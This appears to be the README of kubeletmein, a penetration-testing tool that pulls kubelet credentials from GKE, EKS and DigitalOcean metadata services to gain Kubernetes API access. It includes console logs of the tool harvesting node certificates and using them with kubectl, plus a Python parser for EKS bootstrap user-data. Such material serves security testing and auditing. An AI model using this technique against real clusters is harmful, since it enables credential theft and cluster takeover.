kubeletmein is a simple penetration-testing tool that exploits weaknesses in cloud provider metadata services to obtain node (kubelet) credentials and, with them, access to the Kubernetes API.
That access can then be used to take over other applications running in the cluster and, in many cases, to gain complete control of the Kubernetes cluster.
Supported providers and usage
GKE
Google Kubernetes Engine (GKE) is fully supported; the technique relies on metadata concealment being disabled on the node pool, so that pods can read the node's kubelet credentials from the metadata service.
root@kubeletmein-vulnerable:/# kubeletmein generate
2021-03-04T22:25:52Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T22:25:52Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet cert to: kubelet.crt
2021-03-04T22:25:52Z [ℹ] writing kubelet key to: kubelet.key
2021-03-04T22:25:52Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T22:25:52Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node
2021-03-04T22:25:53Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T22:25:53Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME                     READY   STATUS    RESTARTS   AGE
kubeletmein-vulnerable   1/1     Running   0          12m
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get nodes
NAME                                                  STATUS   ROLES   AGE   VERSION
gke-kubeletmein-kubeletmein-vulnerabl-6623dbee-mgkd   Ready            11m   v1.18.12-gke.1210
EKS
Support for Amazon Elastic Kubernetes Service (EKS) was originally added by @airman604 and is based on the AWS EKS node bootstrap script. It has since been extended to support the different kinds of user-data encountered on EKS nodes.
Specifically, it supports both the cloud-config and the shell-script user-data formats. In the latter case, the program attempts to parse the command-line arguments passed to /etc/eks/bootstrap.sh and retrieves the values it needs (cluster name, API server endpoint and cluster CA) from there.
~ $ kubeletmein generate
2021-03-02T21:37:59Z [ℹ] running autodetect
2021-03-02T21:37:59Z [ℹ] EKS detected
2021-03-02T21:37:59Z [ℹ] fetching cluster information from user-data from the metadata service
2021-03-02T21:37:59Z [ℹ] getting IMDSv2 token
2021-03-02T21:37:59Z [ℹ] getting user-data
2021-03-02T21:37:59Z [ℹ] generating EKS node kubeconfig file at: kubeconfig
2021-03-02T21:37:59Z [ℹ] wrote kubeconfig
2021-03-02T21:37:59Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
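To make the user-data parsing step concrete from the auditor's side (what cluster details a node's launch-template user-data discloses to anything that can read the instance metadata), here is an added Python example; it is not kubeletmein's own code. The user-data below is constructed, the /etc/eks/bootstrap.sh flag names are the standard ones (--apiserver-endpoint, --b64-cluster-ca, --kubelet-extra-args), and only the shell-script format is handled, not cloud-config.

```python
import shlex

BOOTSTRAP = "/etc/eks/bootstrap.sh"

# Constructed sample user-data in the shell-script format used by EKS nodes
# (not captured from a real cluster); endpoint and CA blob are placeholders.
SAMPLE_USER_DATA = """#!/bin/bash
set -o xtrace
/etc/eks/bootstrap.sh example-cluster \\
  --apiserver-endpoint 'https://EXAMPLE.gr7.us-east-1.eks.amazonaws.com' \\
  --b64-cluster-ca 'QkFTRTY0LUNBLVBMQUNFSE9MREVS' \\
  --kubelet-extra-args '--node-labels=role=worker'
"""


def parse_bootstrap_args(user_data: str) -> dict:
    """Locate the bootstrap.sh invocation in shell-script user-data and return
    its positional cluster name plus every --flag value as a dict.

    Returns {} when no invocation is found (e.g. cloud-config user-data).
    """
    # Fold backslash-newline continuations so the call sits on one line.
    folded = user_data.replace("\\\n", " ")
    for line in folded.splitlines():
        # shlex honours shell quoting; comments=True drops the #! line.
        tokens = shlex.split(line, comments=True)
        if BOOTSTRAP not in tokens:
            continue
        args = tokens[tokens.index(BOOTSTRAP) + 1:]
        result = {}
        i = 0
        while i < len(args):
            tok = args[i]
            if tok.startswith("--"):
                if "=" in tok:                      # --flag=value form
                    key, _, val = tok[2:].partition("=")
                else:                               # --flag value form; every
                    key = tok[2:]                   # bootstrap.sh flag takes a
                    i += 1                          # value, so always consume
                    val = args[i] if i < len(args) else None
                result[key] = val
            else:
                # First non-flag token is the positional cluster name.
                result.setdefault("cluster_name", tok)
            i += 1
        return result
    return {}


if __name__ == "__main__":
    for key, value in parse_bootstrap_args(SAMPLE_USER_DATA).items():
        print(f"{key}: {value}")
```

Note that a quoted value such as '--node-labels=role=worker' survives shlex as a single token that itself starts with "--", which is why the parser always consumes the token after a flag instead of guessing whether it is a value.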
Digital Ocean
DigitalOcean is supported: DO exposes kubelet credentials through its metadata service, and this cannot be disabled.
root@kubeletmein-vulnerable:/# kubeletmein generate
2021-03-04T23:39:46Z [ℹ] running autodetect
2021-03-04T23:39:46Z [ℹ] DigitalOcean detected
2021-03-04T23:39:46Z [ℹ] fetching kubelet creds from metadata service
2021-03-04T23:39:46Z [ℹ] writing ca cert to: ca-certificates.crt
2021-03-04T23:39:46Z [ℹ] generating bootstrap-kubeconfig file at: bootstrap-kubeconfig
2021-03-04T23:39:46Z [ℹ] wrote bootstrap-kubeconfig
2021-03-04T23:39:46Z [ℹ] using bootstrap-config to request new cert for node: kubeletmein-node
2021-03-04T23:39:46Z [ℹ] got new cert and wrote kubeconfig
2021-03-04T23:39:46Z [ℹ] now try: kubectl --kubeconfig kubeconfig get pods
root@kubeletmein-vulnerable:/# kubectl --kubeconfig kubeconfig get pods
NAME                     READY   STATUS    RESTARTS   AGE
kubeletmein-vulnerable   1/1     Running   0          6m12s
You can download the program from here.